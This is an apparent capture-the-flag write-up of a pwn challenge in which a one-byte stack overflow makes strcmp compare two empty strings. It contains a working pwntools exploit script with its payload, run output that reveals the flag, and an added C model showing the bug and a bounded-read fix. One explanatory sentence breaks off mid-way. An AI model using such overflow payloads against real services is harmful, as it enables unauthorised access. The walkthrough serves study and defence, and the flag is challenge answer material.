We start by downloading the source files.
We are given a binary
    local_10 = *(long *)(in_FS_OFFSET + 0x28);
    local_18 = 0x2073736170743377;
    read(0,local_1e,7);
Our goal is that
    iVar1 = strcmp(local_1e,(char *)&local_18);
    if (iVar1 == 0) {
      open_door();
    }
Knowing that the first character of
We do this using Python:

    import pwn
    import sys


    def solve(r: pwn.remote):
        r.recvuntil(">>")  # wait for the input prompt
        r.sendline("\x003tpas\x00")  # 7 bytes for read(): NUL first and NUL last
        r.interactive()


    def conn():
        # Expect exactly two arguments: the remote host and port.
        if len(sys.argv) != 3:
            print(f"Usage: {sys.argv[0]} remote-ip remote-port")
            sys.exit(1)
        r = pwn.remote(sys.argv[1], sys.argv[2])
        return r


    def main():
        r = conn()
        solve(r)


    if __name__ == "__main__":
        main()

Running this script gives us the flag:
    python3 exploit.py 94.237.48.92 30796
    [+] Opening connection to 94.237.48.92 on port 30796: Done
    /home/pepe/ctf/htb/cyber-apocalypse-2024/pwn/writing-on-the-wall/exploit.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
      r.recvuntil(">>")
    /home/pepe/ctf/htb/cyber-apocalypse-2024/pwn/writing-on-the-wall/exploit.py:7: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
      r.sendline("\x003tpas\x00")
    [*] Switching to interactive mode
    You managed to open the door! Here is the password for the next one: HTB{3v3ryth1ng_15_r34d4bl3}
    [*] Got EOF while reading in interactive
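
Why those 7 bytes pass the strcmp check, and how bounding the read closes it, as an added example that is not part of the original writeup or the challenge source. The frame layout (a 6-byte buffer directly below the 8-byte secret, inferred from the names local_1e and local_18), the zero byte standing in for the low byte of the stack canary, and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Model of the decompiled frame (layout assumed from the names local_1e and
 * local_18): 6-byte input buffer, then the 8-byte secret, then one zero byte
 * standing in for the low byte of the stack canary that ends the secret. */
enum { INPUT_LEN = 6, SECRET_OFF = 6, SECRET_LEN = 8, FRAME_LEN = 15 };

/* Copy at most read_max bytes of data to the start of a fresh frame, as
 * read(0, local_1e, read_max) would, then run the same strcmp check. */
static int door_opens(const unsigned char *data, size_t len, size_t read_max)
{
    char frame[FRAME_LEN];
    memset(frame, 0, sizeof frame);
    memcpy(frame + SECRET_OFF, "w3tpass ", SECRET_LEN); /* 0x2073736170743377 */
    if (len > read_max)
        len = read_max;
    memcpy(frame, data, len);           /* byte 7 lands on frame[SECRET_OFF] */
    return strcmp(frame, frame + SECRET_OFF) == 0;
}

/* As in the binary: 7 bytes read into a 6-byte buffer. */
int check_vulnerable(const unsigned char *data, size_t len)
{
    return door_opens(data, len, INPUT_LEN + 1);
}

/* Hardened: the read is bounded by the buffer, leaving room for the NUL. */
int check_fixed(const unsigned char *data, size_t len)
{
    return door_opens(data, len, INPUT_LEN - 1);
}

int main(void)
{
    /* The 7 bytes that read() consumes from the script's sendline call. */
    static const unsigned char payload[] = { 0, '3', 't', 'p', 'a', 's', 0 };
    static const unsigned char guess[] = "w3tpas";

    printf("vulnerable, payload: %d\n", check_vulnerable(payload, sizeof payload));
    printf("vulnerable, guess:   %d\n", check_vulnerable(guess, 6));
    printf("fixed, payload:      %d\n", check_fixed(payload, sizeof payload));
    return 0;
}
```

In the vulnerable path both strings start with a NUL after the read, so strcmp compares two empty strings; with the bounded read the secret is never written and the same input fails.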